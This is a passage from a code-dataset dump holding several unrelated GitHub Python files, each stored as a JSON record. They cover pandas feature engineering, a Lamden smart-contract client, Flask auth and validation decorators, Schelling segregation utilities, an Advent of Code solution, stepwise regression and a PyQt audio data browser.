df.TotRmsAbvGrd\nX_1[\"TotalOutsideSF\"] = df.WoodDeckSF + df.OpenPorchSF + df.EnclosedPorch + df.Threeseasonporch + df.ScreenPorch\nX_1[[\"LivLotRatio\",\"Spaciousness\"]].head()\n\n# Create interation features between BldgType and GrLivArea\n# One-hot encode BldgType\nX_2 = pd.get_dummies(df.BldgType, prefix=\"Bldg\")\nX_2 = X_2.mul(df.GrLivArea, axis=0)\n# Get Multiplication of dataframe and other, element-wise.\n\n# Count how many of the following are > 0\nX_3 = pd.DataFrame()\nX_3[\"PorchTypes\"] = df[[\n \"WoodDeckSF\",\n \"OpenPorchSF\",\n \"EnclosedPorch\",\n \"Threeseasonporch\",\n \"ScreenPorch\",\n]].gt(0.0).sum(axis=1)\n\n# MSSubClass describes the type of a dwelling\ndf.MSSubClass.unique()\n\n# Create a feature containing only the first word of each type\nX_4 = pd.DataFrame()\nX_4[\"MSClass\"] = df.MSSubClass.str.split(\"_\", n=1, expand=True)[0]\n\n# Group transform\nX_5 = pd.DataFrame()\nX_5[\"MedNhbdArea\"] = (df.groupby(\"Neighborhood\")['GrLivArea'].transform('median'))\n\n# Join features\nX_new = X.join([X_1, X_2, X_3, X_4, X_5])\nscore_dataset(X_new, y)\n\n##########################################################################\n\n# Data visualization can suggest transformations,\n# often a \"reshaping\" of a feature through powers or logarithms.\n# The distribution of WindSpeed in US Accidents is highly skewed,\n# for instance. In this case the logarithm is effective at normalizing it:\n# If the feature has 0.0 values, use np.log1p (log(1+x)) instead of np.log\naccidents[\"LogWindSpeed\"] = accidents.WindSpeed.apply(np.log1p)\n# Plot a comparison\nfig, axs = plt.subplots(1, 2, figsize=(8, 4))\nsns.kdeplot(accidents.WindSpeed, shade=True, ax=axs[0])\nsns.kdeplot(accidents.LogWindSpeed, shade=True, ax=axs[1]);\n\n# Counts\n# Binary features (1 for Present, 0 for Absent) or boolean (True or False)\n# In Python, booleans can be added up just as if they were integers.\nroadway_features = [\"Amenity\", \"Bump\", \"Crossing\", \"GiveWay\",\n \"Junction\", \"NoExit\", \"Railway\", \"Roundabout\", \"Station\", \"Stop\",\n \"TrafficCalming\", \"TrafficSignal\"]\naccidents[\"RoadwayFeatures\"] = accidents[roadway_features].sum(axis=1)\naccidents[roadway_features + [\"RoadwayFeatures\"]].head(10)\n\n# Break down features\ncustomer[[\"Type\", \"Level\"]] = ( # Create two new features\n customer[\"Policy\"] # from the Policy feature\n .str # through the string accessor\n .split(\" \", expand=True) # by splitting on \" \"\n # and expanding the result into separate columns\n)\ncustomer[[\"Policy\", \"Type\", \"Level\"]].head(10)\n\n# Join features\nautos[\"make_and_style\"] = autos[\"make\"] + \"_\" + autos[\"body_style\"]\nautos[[\"make\", \"body_style\", \"make_and_style\"]].head()\n\n# Group Transforms\n# methods: max, min, mean, median, var, std, count\ncustomer[\"AverageIncome\"] = (\n customer.groupby(\"State\") # for each state\n [\"Income\"] # select the income\n .transform(\"mean\") # and compute its mean\n)\ncustomer[[\"State\", \"Income\", \"AverageIncome\"]].head(10)\n\ncustomer[\"StateFreq\"] = (\n customer.groupby(\"State\")\n [\"State\"]\n .transform(\"count\")\n / customer.State.count()\n)\ncustomer[[\"State\", \"StateFreq\"]].head(10)\n\n\n# Create a \"frequency encoding\" for a categorical feature\n# If you're using training and validation splits, to preserve their independence,\n# it's best to create a grouped feature using only the training set\n# and then join it to the validation set. We can use the validation set's merge method\n# after creating a unique set of values with drop_duplicates on the training set:\n\n# Create splits\ndf_train = customer.sample(frac=0.5)\ndf_valid = customer.drop(df_train.index)\n\n# Create the average claim amount by coverage type, on the training set\ndf_train[\"AverageClaim\"] = df_train.groupby(\"Coverage\")[\"ClaimAmount\"].transform(\"mean\")\n\n# Merge the values into the validation set\ndf_valid = df_valid.merge(\n df_train[[\"Coverage\", \"AverageClaim\"]].drop_duplicates(),\n on=\"Coverage\",\n how=\"left\",\n)\n\ndf_valid[[\"Coverage\", \"AverageClaim\"]].head(10)\n\n# Create splits\ndf_train = customer.sample(frac=0.5)\ndf_valid = customer.drop(df_train.index)\n\n# Create the average claim amount by coverage type, on the training set\ndf_train[\"AverageClaim\"] = df_train.groupby(\"Coverage\")[\"ClaimAmount\"].transform(\"mean\")\n\n# Merge the values into the validation set\ndf_valid = df_valid.merge(\n df_train[[\"Coverage\", \"AverageClaim\"]].drop_duplicates(),\n on=\"Coverage\",\n how=\"left\",\n)\n\ndf_valid[[\"Coverage\", \"AverageClaim\"]].head(10)\n","repo_name":"jianigao/Feature-Engineering","sub_path":"Creating-Features_Housing.py","file_name":"Creating-Features_Housing.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37688123526","text":"from contracting.execution.executor import Executor, DEFAULT_STAMPS\nfrom contracting.db.driver import ContractDriver, FSDriver\nfrom contracting.compilation.compiler import ContractingCompiler\nfrom contracting.stdlib.bridge.time import Datetime\nfrom datetime import datetime\nfrom functools import partial\nimport ast\nimport inspect\nimport astor\nimport autopep8\nfrom types import FunctionType\nimport os\n\nfrom . import config\n\nfrom .db.orm import Variable\nfrom .db.orm import Hash\n\n\nclass AbstractContract:\n def __init__(self, name, signer, environment, executor: Executor, funcs):\n self.name = name\n self.signer = signer\n self.environment = environment\n self.executor = executor\n self.functions = funcs\n\n # set up virtual functions\n for f in funcs:\n # unpack tuple packed in SenecaClient\n func, kwargs = f\n\n # set the kwargs to None. these will fail if they are not provided\n default_kwargs = {}\n for kwarg in kwargs:\n default_kwargs[kwarg] = None\n\n # each function is a partial that allows kwarg overloading and overriding\n setattr(self, func, partial(self._abstract_function_call,\n signer=self.signer,\n contract_name=self.name,\n executor=self.executor,\n func=func,\n # environment=self.environment,\n **default_kwargs))\n\n def keys(self):\n return self.executor.driver.get_contract_keys(self.name)\n\n # a variable contains a DOT, but no __, and no :\n # a hash contains a DOT, no __, and a :\n # a constant contains __, a DOT, and :\n\n def quick_read(self, variable, key=None, args=None):\n a = []\n\n if key is not None:\n a.append(key)\n\n if args is not None and isinstance(args, list):\n for arg in args:\n a.append(arg)\n\n k = self.executor.driver.make_key(contract=self.name, variable=variable, args=a)\n return self.executor.driver.get(k)\n\n def quick_write(self, variable, key=None, value=None, args=None):\n if key is not None:\n a = [key]\n else:\n a = []\n\n if args is not None and isinstance(args, list):\n for arg in args:\n a.append(arg)\n\n k = self.executor.driver.make_key(contract=self.name, variable=variable, args=a)\n\n self.executor.driver.set(k, value)\n self.executor.driver.commit()\n\n def run_private_function(self, f, signer=None, environment=None, **kwargs):\n # Override kwargs if provided\n signer = signer or self.signer\n environment = environment or self.environment\n\n # Let executor access private functions\n self.executor.bypass_privates = True\n\n # Append private method prefix to function name if it isn't there already\n if not f.startswith(config.PRIVATE_METHOD_PREFIX):\n f = '{}{}'.format(config.PRIVATE_METHOD_PREFIX, f)\n\n # Execute\n result = self._abstract_function_call(signer=signer, executor=self.executor, contract_name=self.name,\n environment=environment, func=f, metering=None, now=None, **kwargs)\n\n # Set executor back to restricted mode\n self.executor.bypass_privates = False\n\n return result\n\n def __getattr__(self, item):\n try:\n # return the attribute if it exists on the instance\n return self.__getattribute__(item)\n except AttributeError as e:\n\n # otherwise, attempt to resolve it. full name is contract.item\n fullname = '{}.{}'.format(self.name, item)\n\n # if the raw name exists, it is a __protected__ or a variable, so prepare for those\n if fullname in self.keys():\n variable = Variable(contract=self.name, name=item, driver=self.executor.driver)\n\n # return just the value if it is __protected__ to prevent sets\n if item.startswith('__'):\n return variable.get()\n\n # otherwise, return the variable object with allows sets\n return variable\n\n # otherwise, see if contract.items: has more than one entry\n if len(self.executor.driver.values(prefix=self.name + '.' + item + ':')) > 0:\n\n # if so, it is a hash. return the hash object\n return Hash(contract=self.name, name=item, driver=self.executor.driver)\n\n # otherwise, the attribut does not exist, so throw the error.\n raise e\n\n def now(self):\n d = datetime.today()\n return Datetime(d.year, d.month, d.day, hour=d.hour, minute=d.minute)\n\n def _abstract_function_call(self, signer, executor, contract_name, func, environment=None, stamps=DEFAULT_STAMPS, metering=None, now=None, **kwargs):\n # for k, v in kwargs.items():\n # assert v is not None, 'Keyword \"{}\" not provided. Must not be None.'.format(k)\n environment = environment or self.environment\n\n if now is None:\n now = self.now()\n\n if environment.get('now') is None:\n environment.update({'now': now})\n\n output = executor.execute(sender=signer,\n contract_name=contract_name,\n function_name=func,\n kwargs=kwargs,\n stamps=stamps,\n environment=environment,\n metering=metering)\n\n if executor.production:\n executor.sandbox.terminate()\n\n if output['status_code'] == 1:\n raise output['result']\n\n return output['result']\n\n\nclass ContractingClient:\n def __init__(self, signer='sys',\n submission_filename=os.path.join(os.path.dirname(__file__), 'contracts/submission.s.py'),\n driver=ContractDriver(),\n metering=False,\n compiler=ContractingCompiler(),\n environment={}):\n\n self.executor = Executor(metering=metering, driver=driver)\n self.raw_driver = driver\n self.signer = signer\n self.compiler = compiler\n self.submission_filename = submission_filename\n self.environment = environment\n\n # Get submission contract from file\n if submission_filename is not None:\n # Seed the genesis contracts into the instance\n with open(self.submission_filename) as f:\n contract = f.read()\n\n self.raw_driver.set_contract(name='submission',\n code=contract)\n\n self.raw_driver.commit()\n\n # Get submission contract from state\n self.submission_contract = self.get_contract('submission')\n\n def set_submission_contract(self, filename=None, commit=True):\n state_contract = self.get_contract('submission')\n\n if filename is None:\n filename = self.submission_filename\n\n if filename is None and state_contract is None:\n raise AssertionError(\"No submission contract provided or found in state.\")\n\n if filename is not None:\n with open(filename) as f:\n contract = f.read()\n\n self.raw_driver.delete_contract(name='submission')\n self.raw_driver.set_contract(name='submission',\n code=contract)\n if commit:\n self.raw_driver.commit()\n\n self.submission_contract = self.get_contract('submission')\n\n\n def flush(self):\n # flushes db and resubmits genesis contracts\n self.raw_driver.flush()\n self.raw_driver.clear_pending_state()\n\n if self.submission_filename is not None:\n self.set_submission_contract()\n\n # Returns abstract contract which has partial methods mapped to each exported function.\n def get_contract(self, name):\n contract = self.raw_driver.get_contract(name)\n\n if contract is None:\n return None\n\n tree = ast.parse(contract)\n\n function_defs = [n for n in ast.walk(tree) if isinstance(n, ast.FunctionDef)]\n\n funcs = []\n for definition in function_defs:\n func_name = definition.name\n kwargs = [arg.arg for arg in definition.args.args]\n\n funcs.append((func_name, kwargs))\n\n return AbstractContract(name=name,\n signer=self.signer,\n environment=self.environment,\n executor=self.executor,\n funcs=funcs)\n\n def closure_to_code_string(self, f):\n closure_code = inspect.getsource(f)\n closure_code = autopep8.fix_code(closure_code)\n closure_tree = ast.parse(closure_code)\n\n # Remove the enclosing function by swapping out the function def node with its children\n assert len(closure_tree.body) == 1, 'Module has multiple body nodes.'\n assert isinstance(closure_tree.body[0], ast.FunctionDef), 'Function definition not found at root.'\n\n func_def_body = closure_tree.body[0]\n closure_tree.body = func_def_body.body\n\n contract_code = astor.to_source(closure_tree)\n name = func_def_body.name\n\n return contract_code, name\n\n def lint(self, f, raise_errors=False):\n if isinstance(f, FunctionType):\n f, _ = self.closure_to_code_string(f)\n\n tree = ast.parse(f)\n violations = self.compiler.linter.check(tree)\n\n if violations is None:\n return None\n else:\n if raise_errors:\n for v in violations:\n raise Exception(v)\n else:\n return violations\n\n def compile(self, f):\n if isinstance(f, FunctionType):\n f, _ = self.closure_to_code_string(f)\n\n code = self.compiler.parse_to_code(f)\n return code\n\n def submit(self, f, name=None, metering=None, owner=None, constructor_args={}, signer=None):\n\n assert self.submission_contract is not None, \"No submission contract set. Try set_submission_contract first.\"\n\n if isinstance(f, FunctionType):\n f, n = self.closure_to_code_string(f)\n if name is None:\n name = n\n\n assert name is not None, 'No name provided.'\n\n if signer is None:\n signer = self.signer\n\n self.submission_contract.submit_contract(name=name, code=f, owner=owner, constructor_args=constructor_args,\n metering=metering, signer=signer)\n\n def get_contracts(self):\n if isinstance(self.raw_driver.driver, FSDriver):\n return self.raw_driver.driver.get_contracts()\n\n contracts = []\n for key in self.raw_driver.keys():\n if key.endswith('.__code__'):\n contracts.append(key.replace('.__code__', ''))\n return contracts\n\n def get_var(self, contract, variable, arguments=[], mark=False):\n return self.raw_driver.get_var(contract, variable, arguments, mark)\n\n def set_var(self, contract, variable, arguments=[], value=None, mark=False):\n self.raw_driver.set_var(contract, variable, arguments, value, mark)\n","repo_name":"Lamden/contracting","sub_path":"contracting/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":11491,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"81"} +{"seq_id":"14557978206","text":"import re\nfrom functools import wraps\nfrom flask import request\nfrom app.models.users import Users as User\n\n\ndef authenticate(func):\n @wraps(func)\n def inner_methos(*args, **kwargs):\n if \"Authorization\" in request.headers:\n token = request.headers.get(\"Authorization\")\n user = User.verify_token(token)\n if user:\n kwargs['user'] = user\n kwargs['token'] = token\n return func(*args, **kwargs)\n else:\n return {\"status\": \"failed\", \"message\": \"Not authorised\"}, 409\n else:\n return {\"status\": \"failed\", \"message\": \"Not authorised\"}, 409\n inner_methos.__doc__ = func.__doc__\n return inner_methos\n\n\ndef validate(params):\n def validate_wrapper(func):\n @wraps(func)\n def inner_method(*args, **kwargs):\n \"\"\" This method validates user input against a set of requiredninput using regex\"\"\"\n errors = {'missing': [], 'errors': []}\n for key in params.keys():\n if key in request.data:\n if len(request.data.get(key)) > 0:\n if params[key]['type'] == 'integer':\n regexp = re.compile(r\"(^[0-9]*$#)\")\n compare = request.data.get(key)\n if not regexp.match(compare):\n errors['errors'].append(\n {'value': compare, 'field type': key, 'message': 'Please provide a valid integer'})\n\n if params[key]['type'] == 'text':\n regexp = re.compile(r\"(^[a-zA-Z0-9' ]*$)\")\n compare = request.data.get(key)\n if not regexp.match(compare):\n errors['errors'].append(\n {'value': compare, 'field type': key, 'message': 'Please provide a valid string'})\n else:\n if 'min-length' in params[key] and len(compare.strip()) < params[key]['min-length']:\n errors['errors'].append(\n {'value': compare, 'field type': key, 'message': 'Minimum length reached'})\n\n if params[key]['type'] == 'email':\n address = re.compile(\n r\"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)\")\n compare = request.data.get(key)\n if not address.match(compare):\n errors['errors'].append(\n {'value': compare, 'field type': key, 'message': 'Please provide a valid email'})\n else:\n errors['missing'].append(key)\n else:\n errors['missing'].append(key)\n\n if len(errors['missing']) > 0 or len(errors['errors']) > 0:\n return {'status': 'failed', 'message': 'Please check your input', 'errors': errors}, 400\n else:\n return func(*args, **kwargs)\n\n inner_method.__doc__ = func.__doc__\n return inner_method\n return validate_wrapper\n","repo_name":"devGenie/bucketlistAPI","sub_path":"app/common/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"15650946728","text":"import math\nimport random\nimport numpy as np\nfrom scipy.stats import betabinom\n\ndef betabinom_mus(ALPHA, BETA, NUM_AGENTS):\n return betabinom.rvs(10, ALPHA, BETA, size=NUM_AGENTS) /10\n\ndef Moore_neighbors(row: int, col: int, NUM_ROW: int, NUM_COL: int) ->list:\n \"\"\"function which returns Moore neighbors list of (row, col)\"\"\"\n if row == 0:\n row_under, row_self, row_upper = NUM_ROW - 1, row, row + 1\n elif row == NUM_ROW - 1:\n row_under, row_self, row_upper = row - 1, row, 0\n else:\n row_under, row_self, row_upper = row - 1, row, row + 1\n\n if col == 0:\n col_under, col_self, col_upper = NUM_COL - 1, col, col + 1\n elif col == NUM_COL - 1:\n col_under, col_self, col_upper = col - 1, col, 0\n else:\n col_under, col_self, col_upper = col - 1, col, col + 1\n\n Moore_neighbors = [(row, col) for row in [row_under, row_self, row_upper] for col in [col_under, col_self, col_upper]]\n Moore_neighbors.remove((row, col))\n return Moore_neighbors\n\nclass Agent:\n def __init__(self, row:int, col:int, mu:float, p:float):\n # row, col in {0,1,2,...}\n # mu: membership value to A, mu in [0,1], in actual trial {0, 0.1, 0.2, ..., 1}\n # p: percent similar wanted, p in [0,1]\n self.row, self.col = row, col\n self.mu = mu\n self.p = p\n self.neighbor_agents_mu = []\n self.s_sq = None\n self.fuzzy = None\n self.percent_wanted_neighbor = None\n self.next_move = False\n\n def search_neighbors(self, agents_field):\n # picking up Moore neighbors address of self\n moore_neighbors_address = Moore_neighbors(self.row, self.col, agents_field.shape[0], agents_field.shape[1])\n # neighbors agents list\n neighbor_agents = [agents_field[address] for address in moore_neighbors_address]\n # neighbors agents mus list\n self.neighbor_agents_mu = [agent.mu for agent in neighbor_agents if agent != None]\n # s_sq: average neighbors similarity\n if len(self.neighbor_agents_mu) == 0:\n self.s_sq = None\n else:\n self.s_sq = 1 - np.mean((np.array(self.neighbor_agents_mu) - self.mu) ** 2)\n # fuzzy: fuzziness of A in the neighborhoods\n neighbor_incl_myself_mu = self.neighbor_agents_mu + [self.mu]\n self.fuzzy = np.mean([H(x) for x in neighbor_incl_myself_mu])\n\n def moving_decision(self):\n if len(self.neighbor_agents_mu) == 0:\n self.percent_wanted_neighbor = 0\n else:\n if self.mu > 0.5:\n self.percent_wanted_neighbor = len([mu for mu in self.neighbor_agents_mu if mu >= self.mu]) / len(self.neighbor_agents_mu)\n elif self.mu < 0.5:\n self.percent_wanted_neighbor = len([mu for mu in self.neighbor_agents_mu if mu <= self.mu]) / len(self.neighbor_agents_mu)\n else:\n self.percent_wanted_neighbor = 1\n if self.p == 0:\n self.next_move = False\n elif self.percent_wanted_neighbor >= self.p:\n self.next_move = False\n else:\n self.next_move = True\n\ndef initial_field_address(NUM_ROW: int, NUM_COL: int, NUM_AGENTS: int):\n #overall address list\n field_address = [(x, y) for x in range(NUM_ROW) for y in range(NUM_COL)]\n # initial occupied address list\n occupied_address = random.sample(field_address, NUM_AGENTS)\n # non occupied address list\n non_occupied_address = list(set(field_address) - set(occupied_address))\n return occupied_address, non_occupied_address\n\ndef initializing_field(NUM_ROW: int, NUM_COL: int, dtype=object):\n \"\"\"\n making 2 dimensional numpy array for storing agents' information\n \"\"\"\n field = np.zeros([NUM_ROW, NUM_COL], dtype=dtype)\n field[:,:] = None # if dtype is float, then nan\n return field\n\ndef H(p: float) ->float:\n \"\"\"\n binary entropy function. H: [0, 1] -> [0, 1]\n \"\"\"\n if p == 0 or p == 1:\n return 0\n else:\n return -p * math.log2(p) - (1 - p) * math.log2(1 - p)\n\ndef D(p: float, q: float) ->float:\n \"\"\"\n binary KL divergence\n \"\"\"\n if p == 1:\n if q == 0:\n return math.inf\n else:\n return p * math.log2(p / q)\n elif p == 0:\n if q == 1:\n return math.inf\n else:\n return (1 - p) * math.log2((1 - p) / (1 - q))\n else:\n if q == 0 or q == 1:\n return math.inf\n else:\n return p * math.log2(p / q) + (1 - p) * math.log2((1 - p) / (1 - q))","repo_name":"aishidajt9/fuzzySchelling","sub_path":"fuzzy_Schelling_utils/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74782682504","text":"# Encapsulation (or) Data Hiding :\r\n# It allows preventing the functions of a program to access directly the internal representation of a class type.\r\n# We use double underscore __ before the attributes names to make those attributes private.\r\n\r\nclass Myclass :\r\n __hiddenvariable = 2\r\n\r\n def add(self, increment):\r\n self.__hiddenvariable += increment\r\n print(self.__hiddenvariable)\r\n\r\nobject1 = Myclass()\r\nobject1.add(5)\r\n# print(object1.__hiddenvariable)\r\n\r\n","repo_name":"cuteboygowtham/python","sub_path":"data hiding or encapsulation.py","file_name":"data hiding or encapsulation.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18678471705","text":"from aocd.models import Puzzle\nfrom collections import defaultdict\nimport logging\nimport re\nimport sys\n\nlogging.basicConfig(level=logging.INFO)\n\n# Ugh.\nsys.setrecursionlimit(50000)\n\np = Puzzle(year=2022, day=18)\n\nPART_ONE = False\nTEST = False\n\nif TEST:\n lines = [\n \"2,2,2\",\n \"1,2,2\",\n \"3,2,2\",\n \"2,1,2\",\n \"2,3,2\",\n \"2,2,1\",\n \"2,2,3\",\n \"2,2,4\",\n \"2,2,6\",\n \"1,2,5\",\n \"3,2,5\",\n \"2,1,5\",\n \"2,3,5\",\n ]\nelse:\n lines = p.input_data.splitlines()\n\nclass Cube:\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n\n def __str__(self):\n return f\"{self.x},{self.y},{self.z}\"\n\ndef neighbours(c1, c2):\n if abs(c1.x - c2.x) == 1 and c1.y == c2.y and c1.z == c2.z:\n return True\n if c1.x == c2.x and abs(c1.y - c2.y) == 1 and c1.z == c2.z:\n return True\n if c1.x == c2.x and c1.y == c2.y and abs(c1.z - c2.z) == 1:\n return True\n\ndef count_inside_faces(c):\n insides = 0\n x, y, z = (c.x, c.y, c.z)\n for (nx, ny, nz) in [(x-1, y, z), (x+1, y, z),\n (x, y-1, z), (x, y+1, z),\n (x, y, z-1), (x, y, z+1)]:\n if (nx, ny, nz) not in cube_map:\n insides += 1\n return insides\n\ndef flood_fill(x, y, z):\n if (x, y, z) in cube_map:\n return\n logging.debug(f\"Flood filling {(x, y, z)}\")\n\n cube_map[(x, y, z)] = None\n\n if x - 1 >= min_x:\n flood_fill(x - 1, y, z)\n if x + 1 <= max_x:\n flood_fill(x + 1, y, z)\n\n if y - 1 >= min_y:\n flood_fill(x, y - 1, z)\n if y + 1 <= max_y:\n flood_fill(x, y + 1, z)\n\n if z - 1 >= min_z:\n flood_fill(x, y, z - 1)\n if z + 1 <= max_z:\n flood_fill(x, y, z + 1)\n\ncubes = []\ncube_map = {}\n\nfor line in lines:\n x, y, z = [int(n) for n in line.split(',')]\n cube = Cube(x, y, z)\n cubes.append(cube)\n cube_map[(x,y,z)] = cube\n\nmin_x, min_y, min_z = cubes[0].x, cubes[0].y, cubes[0].z\nmax_x, max_y, max_z = cubes[0].x, cubes[0].y, cubes[0].z\n\nfor cube in cubes[1:]:\n if cube.x < min_x:\n min_x = cube.x\n if cube.y < min_y:\n min_y = cube.y\n if cube.z < min_z:\n min_z = cube.z\n\n if cube.x > max_x:\n max_x = cube.x\n if cube.y > max_y:\n max_y = cube.y\n if cube.z > max_z:\n max_z = cube.z\n\nlogging.debug(f\"Extent: {(min_x, min_y, min_z)} to {(max_x, max_y, max_z)}\")\nmin_x -= 1\nmin_y -= 1\nmin_z -= 1\nmax_x += 1\nmax_y += 1\nmax_z += 1\nlogging.debug(f\"Grown Extent: {(min_x, min_y, min_z)} to {(max_x, max_y, max_z)}\")\n\nif not PART_ONE:\n flood_fill(min_x, min_y, min_z)\n\n# Shrink the extents back\nmin_x += 1\nmin_y += 1\nmin_z += 1\nmax_x -= 1\nmax_y -= 1\nmax_z -= 1\n\nsurface_area = 6 * len(cubes)\nlogging.info(f\"Found {len(cubes)} cubes. Max possible surface area is {surface_area}.\")\nfor a, cube in enumerate(cubes):\n cube_faces = 6\n for b, other_cube in enumerate(cubes):\n if a == b:\n continue\n if neighbours(cube, other_cube):\n surface_area -= 1\n cube_faces -= 1\n logging.debug(f\"Cube {a} {(cube.x,cube.y,cube.z)} neighbours {b} {(other_cube.x,other_cube.y,other_cube.z)}, now has {cube_faces} exposed.\")\n\n if not PART_ONE:\n # consider inside faces\n insides = count_inside_faces(cube)\n if insides > 0:\n logging.debug(f\"Cube {cube} had {insides} inside faces. Don't count those.\")\n surface_area -= insides\n\nlogging.info(f\"Surface area: {surface_area}.\")\n\nif not TEST:\n if PART_ONE:\n p.answer_a = surface_area\n else:\n p.answer_b = surface_area\n","repo_name":"mreid-moz/advent_of_code","sub_path":"2022/day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26472173819","text":"import numpy as np\r\nimport pandas as pd\r\nimport statsmodels.api as sm\r\n\r\n\r\ndef backward_regression(X, y,\r\n threshold_out,\r\n verbose=False):\r\n print('Backward Selection')\r\n included=list(X.columns)\r\n while True:\r\n changed=False\r\n model = sm.OLS(y, sm.add_constant(pd.DataFrame(X[included]))).fit()\r\n # use all coefs except intercept\r\n pvalues = model.pvalues.iloc[1:]\r\n worst_pval = pvalues.max() # null if pvalues is empty\r\n if worst_pval > threshold_out:\r\n changed=True\r\n worst_feature = pvalues.idxmax()\r\n included.remove(worst_feature)\r\n if verbose:\r\n print('Drop {:30} with p-value {:.6}'.format(worst_feature, worst_pval))\r\n if not changed:\r\n break\r\n return included","repo_name":"chaoannricardo/2020_DataAnalytics","sub_path":"backward_regression.py","file_name":"backward_regression.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19352645061","text":"import os\nimport xml.dom.minidom\nfrom math import fabs, ceil, floor, log, log10\nimport numpy as np\ntry:\n from PyQt5.QtCore import Signal\nexcept ImportError:\n from PyQt5.QtCore import pyqtSignal as Signal\nfrom PyQt5.QtCore import Qt, QTimer\nfrom PyQt5.QtGui import QCursor, QKeySequence\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QScrollArea\nfrom PyQt5.QtWidgets import QAction, QMenu, QToolBar, QComboBox\nfrom PyQt5.QtWidgets import QLabel, QSizePolicy, QTableView\nfrom PyQt5.QtWidgets import QDialog, QDialogButtonBox, QFileDialog\nfrom PyQt5.QtWidgets import QAbstractItemView, QGraphicsRectItem\nimport pyqtgraph as pg\ntry:\n from thunderfish.dataloader import DataLoader\nexcept ImportError:\n from audioio import AudioLoader as DataLoader\nfrom audioio import available_formats, write_audio\nfrom audioio import fade\nfrom .version import __version__, __year__\nfrom .fulltraceplot import FullTracePlot, secs_to_str\nfrom .oscillogramplot import OscillogramPlot\nfrom .spectrumplot import SpectrumPlot\nfrom .traceitem import TraceItem\nfrom .specitem import SpecItem\nfrom .markerdata import colors, MarkerLabel, MarkerLabelsModel\nfrom .markerdata import MarkerData, MarkerDataModel\n\n\npg.setConfigOption('useNumba', True)\n\n\nclass DataBrowser(QWidget):\n\n zoom_region = 0\n play_region = 1\n save_region = 2\n ask_region = 3\n \n sigTimesChanged = Signal(object, object)\n sigAmplitudesChanged = Signal(object, object)\n sigFrequenciesChanged = Signal(object, object)\n sigResolutionChanged = Signal()\n sigFilterChanged = Signal()\n sigPowerChanged = Signal()\n\n \n def __init__(self, file_path, channels, show_channels, audio,\n acts, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # actions of main window:\n self.acts = acts\n\n # data:\n self.file_path = file_path\n self.channels = channels\n self.data = None\n self.rate = None\n self.tmax = 0.0\n self.meta_data = {}\n\n self.show_channels = show_channels\n self.current_channel = 0\n self.selected_channels = []\n \n self.trace_fracs = {0: 1, 1: 1, 2: 0.5, 3: 0.25, 4: 0.15}\n\n self.region_mode = DataBrowser.ask_region\n \n # view:\n self.toffset = 0.0\n self.twindow = 2.0\n\n self.setting = False\n \n self.grids = 0\n self.show_traces = True\n self.show_specs = 2\n self.show_cbars = True\n self.show_fulldata = True\n \n # auto scroll:\n self.scroll_step = 0.0\n self.scroll_timer = QTimer(self)\n self.scroll_timer.timeout.connect(self.scroll_further)\n\n # audio:\n self.audio = audio\n self.audio_timer = QTimer(self)\n self.audio_timer.timeout.connect(self.mark_audio)\n self.audio_time = 0.0\n self.audio_tmax = 0.0\n self.audio_markers = [] # vertical lines showing position while playing\n\n # window:\n self.vbox = QVBoxLayout(self)\n self.vbox.setContentsMargins(0, 0, 0, 0)\n self.vbox.setSpacing(0)\n self.setEnabled(False)\n self.toolbar = None\n self.nfftw = None\n\n # cross hair:\n self.xpos_action = None\n self.ypos_action = None\n self.zpos_action = None\n self.cross_hair = False\n self.marker_ax = None\n self.marker_time = 0\n self.marker_ampl = 0\n self.marker_freq = 0\n self.marker_power = 0\n self.marker_channel = None\n self.prev_time = 0\n self.prev_ampl = 0\n self.prev_freq = 0\n self.prev_power = 0\n self.prev_channel = None\n self.delta_time = None\n self.delta_ampl = None\n self.delta_freq = None\n self.delta_power = None\n self.marker_data = MarkerData()\n self.marker_model = MarkerDataModel(self.marker_data)\n self.marker_labels = []\n self.marker_labels.append(MarkerLabel('start', 's', 'magenta'))\n self.marker_labels.append(MarkerLabel('peak', 'p', 'yellow'))\n self.marker_labels.append(MarkerLabel('end', 'e', 'blue'))\n self.marker_labels_model = MarkerLabelsModel(self.marker_labels,\n self.acts)\n self.marker_orig_acts = []\n \n # plots:\n self.figs = [] # all GraphicsLayoutWidgets - one for each channel\n self.borders = []\n self.sig_proxies = []\n # nested lists (channel, panel):\n self.axs = [] # all plots\n self.axts = [] # plots with time axis\n self.axys = [] # plots with amplitude axis\n self.axfxs = [] # plots with x-frequency axis\n self.axfys = [] # plots with y-frequency axis\n self.axgs = [] # plots with grids\n # lists with one plot per channel:\n self.axtraces = [] # trace plots\n self.axspacers = [] # spacer between trace and spectrogram\n self.axspecs = [] # spectrogram plots\n self.traces = [] # traces\n self.specs = [] # spectrograms\n self.cbars = [] # color bars\n self.trace_labels = [] # labels on traces\n self.spec_labels = [] # labels on spectrograms\n\n\n def __del__(self):\n if not self.data is None:\n self.data.close()\n\n \n def open(self):\n if not self.data is None:\n self.data.close()\n try:\n self.data = DataLoader(self.file_path, 60.0, 10.0)\n except IOError:\n self.data = None\n return\n self.file_path = self.data.filepath\n self.rate = self.data.samplerate\n self.marker_data.file_path = self.file_path\n\n self.toffset = 0.0\n self.twindow = 10.0\n self.tmax = len(self.data)/self.rate\n if self.twindow > self.tmax:\n self.twindow = np.round(2**(floor(log(self.tmax) / log(2.0)) + 1.0))\n\n if self.show_channels is 